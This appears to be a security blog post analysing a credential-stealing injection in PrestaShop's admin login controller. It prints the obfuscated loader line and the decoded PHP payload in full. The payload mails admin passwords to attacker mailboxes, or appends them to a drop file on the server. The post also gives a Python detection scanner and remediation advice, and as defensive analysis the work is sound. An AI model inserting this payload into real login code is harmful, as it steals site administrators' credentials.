Attackers compromise sites with a number of goals in mind – also referred to as actions on objective. In some instances they aim to abuse resources or gain SEO power, and in others they are seeking access to sensitive data, also known as data exfiltration.
The Rise in Cyber Stealing
Lately we’ve noticed an increase in attempts to steal login credentials. We’ve seen many attacks targeting ecommerce websites with the intention of accessing sensitive information, including credit card numbers and back-end credentials. In an earlier post, we described a technique in which hackers injected code that resulted in the victim’s credentials being sent to the attacker’s email address.
This post uncovers another technique being used against PrestaShop sites. As we saw in the previous case, attackers manipulated the ./controllers/admin/AdminLoginController.php file.
Options for Attackers
This time, however, they injected a different piece of malicious code:
eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz
<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));
Here is the decoded version:
<?php
// $employee, $email and $passwd are the variables the surrounding login handler in
// AdminLoginController.php already holds when this injected code runs
if (function_exists("mail")) {
    // Recipient list: two attacker-controlled mailboxes (addresses redacted)
    $listo = array(
        'eNyong' => 'a<removed>@<removed>mail.com',
        'Dowoh'  => 'm<removed>l@<removed>mail.com'
    );
    foreach ($listo as $ming => $imel) {
        // Mail the submitted admin name, email and password, tagged with the victim's hostname
        mail($imel, 'Setoran Admin ' . $_SERVER['HTTP_HOST'] . ' ^_^',
            "Kye Pak $ming,\n\nNama: " . $employee->firstname . " " . $employee->lastname .
            "\nEmail: $email\nPassword: $passwd");
    }
} else {
    // No mail() available: append the credentials to a drop file on the web server instead
    $f = fopen('uspas.txt', 'a');
    fwrite($f, "imel:$email | pass: $passwd\n");
    fclose($f);
}
?>
To capture the credentials, the attackers used a simple conditional. First, the code checks whether PHP's mail() function is available on the server; if it is, the submitted credentials are sent to the attackers' email addresses. If mail() is not available, the code falls back to appending the username and password to a file called uspas.txt on the web server.
Depending on which branch ran, the attackers then either check their inbox or fetch the .txt file directly from the victim's website.
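As an added example (not code from the original post or from PrestaShop), here is a small Python scanner that peels the eval(gzinflate(base64_decode())) wrapper described above and flags the two behaviours of the decoded payload: mailing the password and writing it to uspas.txt. The sample injection it builds is constructed for the test, not the blob shown in the post.

```python
import base64
import re
import zlib

# Injection shape seen in AdminLoginController.php: eval(gzinflate(base64_decode("...")))
OBFUSCATED_CALL = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)'
)

# Behaviours of the decoded payload: mailing the password, or appending it to a drop file
INDICATORS = {
    "mail_exfil": re.compile(r'\bmail\s*\(.*\$passwd', re.S),
    "drop_file": re.compile(r'fopen\s*\(\s*["\']uspas\.txt["\']'),
    "cred_vars": re.compile(r'\$(email|passwd)\b'),
}

def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE, so decompress with negative wbits."""
    return zlib.decompress(data, -zlib.MAX_WBITS)

def decode_layers(source: str, max_depth: int = 5) -> list:
    """Peel nested eval(gzinflate(base64_decode())) wrappers; return each decoded stage."""
    stages, current = [], source
    for _ in range(max_depth):
        match = OBFUSCATED_CALL.search(current)
        if not match:
            break
        try:
            current = gzinflate(base64.b64decode(match.group(1))).decode("utf-8", "replace")
        except (ValueError, zlib.error):
            break  # not a valid base64/deflate layer, stop peeling
        stages.append(current)
    return stages

def scan_php(source: str) -> dict:
    # Scan the innermost decoded stage (or the file itself if it was not wrapped)
    stages = decode_layers(source)
    final = stages[-1] if stages else source
    hits = [name for name, rx in INDICATORS.items() if rx.search(final)]
    return {"obfuscated": bool(stages), "layers": len(stages), "indicators": hits}

def build_sample() -> str:
    """Constructed test input mimicking the injection (not the blob from the post)."""
    payload = (
        'if(function_exists("mail")){mail($imel,"Setoran Admin","Email: $email Password: $passwd");}'
        "else{$f=fopen('uspas.txt','a');fwrite($f,\"imel:$email | pass: $passwd\\n\");fclose($f);}"
    )
    deflater = zlib.compressobj(wbits=-zlib.MAX_WBITS)  # raw DEFLATE, like PHP gzdeflate()
    raw = deflater.compress(payload.encode()) + deflater.flush()
    return 'eval(gzinflate(base64_decode("' + base64.b64encode(raw).decode() + '")));'
```

Run scan_php() over the PHP files under a file integrity monitor's change list; a hit on "obfuscated" alone is already worth a manual look in a login controller.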
Protect Your Site
In case of a compromise, it is good practice to act as if all user accounts and personal information were stolen. We recommend changing all passwords for the back-end, cPanel, SFTP and any other connection mechanism that could give attackers leverage.
Undergoing an attack like this can severely damage a business’s reputation. Keeping good security practices, such as file integrity monitoring, and using a Web Application Firewall will reduce the risk of infection. If your ecommerce site has been compromised, please reach out to us and our Incident Response Team will handle your case directly.